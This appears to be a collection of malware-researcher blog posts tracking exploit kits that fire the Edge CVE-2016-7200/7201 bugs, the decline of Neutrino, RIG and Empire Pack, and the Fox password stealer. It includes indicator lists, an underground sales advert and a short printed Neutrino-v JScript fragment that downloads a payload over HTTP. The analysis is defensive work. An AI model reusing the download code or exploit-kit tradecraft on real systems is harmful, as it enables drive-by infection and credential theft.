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CVE-2016-7200 & CVE-2016-7201 (Edge) and Exploit Kits

CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.

Note : No successful exploitation seen despite integration tries.

On 2017-01-04 @theori_io released a POC
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —
— Theori (@theori_io) 4 janvier 2017

providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.

After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.

The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.

[edit : 2017-01-10]
​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.


Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06
No exploitation here though
Fiddler: (password is malware)

Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)

Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.
So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.
Without big surprise a new exploit is included in the Flash bundle : nw27 >  CVE-2016-7200/7201.

NeutrAds redirect is now  accepting Edge traffic - 2017-01-14

Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14
(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )

Extracted CVE-2016-7200/7201  elements - 2017-01-14

Note: i did not get infection with
- Edge 25.10586.0.0 / EdgeHTML 13.10586
- Edge 20.10240.16384.0

Fiddler&Pcap :  (Password is malware)
Extracted exploits: (Password is malware)

reveiled[.space| - NeutrAds Filtering Redirector
vfwdgpx.amentionq[.win| - Neutrino

Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610
Associated C2 :
buyyou[.org |

So those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get Gootkit
MISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)
2017-01-15 Finding by Simon Choi

CVE-2016-7200/7201 code fired by Kaixin - 2017-01-16
Fiddler : (Password is malware)

Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332


2016-11-10 - Adding information about mitigation on Edge
2016-11-14 - Adding Neutrino
2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not
2016-11-16 - Adding Kaixin

Read More:
Three roads lead to Rome - Qihoo360 - 2016-11-29
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04

RIG evolves, Neutrino waves goodbye, Empire Pack appears

  Neutrino waves Goodbye

Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.

Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS :

Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]
I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load seller. It is making their day to day work with traffic provider far easier .
It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.

Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.
A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.

Neutrino waves goodbye ?

On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :
“we are closed. no new rents, no extends more”
This explains a lot. Here are some of my last Neutrino pass for past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see several actors were still using it…Now here is what i get for the past days :
Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.

Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.
Side reminder : Neutrino disappeared from march 2014 till november 2014

A Neutrino Variant

Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523

Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api

 function k2(k) {
var y = a(e + "." + e + "Request.5.1");
y.setProxy(n);"GET", k(1), n);
y.Option(n) = k(2);
if (200 == y.status) return Rf(y.responseText, k(n))
Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

Some might feel this interface quite familiar…A look a the favicon will give you a hint

Picture 16: RIG EK favicon on Empire Pack panel

Picture 17: RIG Panel

It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.
I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections.
RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIG
  • api.php : historical RIG
  • api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
  • remote_api.php : RIG-v
But Empire Pack might be api3, remote_api, or a bit of both of them.

By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing)


Let’s just conclude this post with statistics pages of two Neutrino threads

Picture 18: Neutrino stats - Aus focused thread - 2016-07-15

Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09

We will be known forever by the tracks we leave
Santee Sioux Tribe

Some IOCs

2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)
2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector


Thanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.


2016-10-03 :
Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.
Added explanation about the IP whitelisting on RIG API (it was not clear)
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.

RIG panel
The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)

RIG-E Behavioral
RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.

2016-12-03 RIG-v Pre-landing

Read More

RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05

Fox stealer: another Pony Fork

Gift for SweetTail-Fox-mlp
 by Mad-N-Monstrous

Small data drop about another Pony fork : Fox stealer.
First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.

Advert :
2016-08-11 - Sold underground by a user going with nickname "Cronbot"

Стилер паролей и нетолько - Fox v1.0

Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.

О продукте : 
1. Умеет все что умеет пони. + добавлен новый софт.
2. Актуален на 2016 год.
3. Написан на С++ без дополнительных библиотек.
4. Админка от пони.

Условия : 
1. Только аренда.
2. Распространяется в виде EXE и DLL.
3. Исходники продавать не будем.

Аренда 250$ в месяц.
Исходники 2000$ разово.

----Translated by Jack Urban : ----

Password stealer and more - Fox v.1.0
We are releasing the product for general sale. Final stage of testing for this product is already underway.
About the product:
1. Is able to do everything that pony does. + new software has been added.
2. Relevant for 2016.
3. Written in C++ without additional libraries.
4. Admin from pony.
1. For rent only.
2. Distributed as an EXE and DLL.
3. We will not be selling the source.
Rent is $250 a month.
Originals are a 2000$ one time fee. 


It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .

MISP taxonomy tags reflecting ScriptJS activity in the last months
(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )

2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13
Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2

Fox stealer (PonyForx) fingerprint in Cuckoo

Sample :
Associated C2:
Caught by ET rule :
2821590 || ETPRO TROJAN Win32.Pony Variant Checkin

[1] ScriptJS's Pony :
master.districtpomade[.]com| - 2015-08-15 Pony C2 from ScriptJS
​js.travelany[.]com[.]ve| - 2015-12-10 Pony C2 from ScriptJS

Read More : few bits about ScriptJS
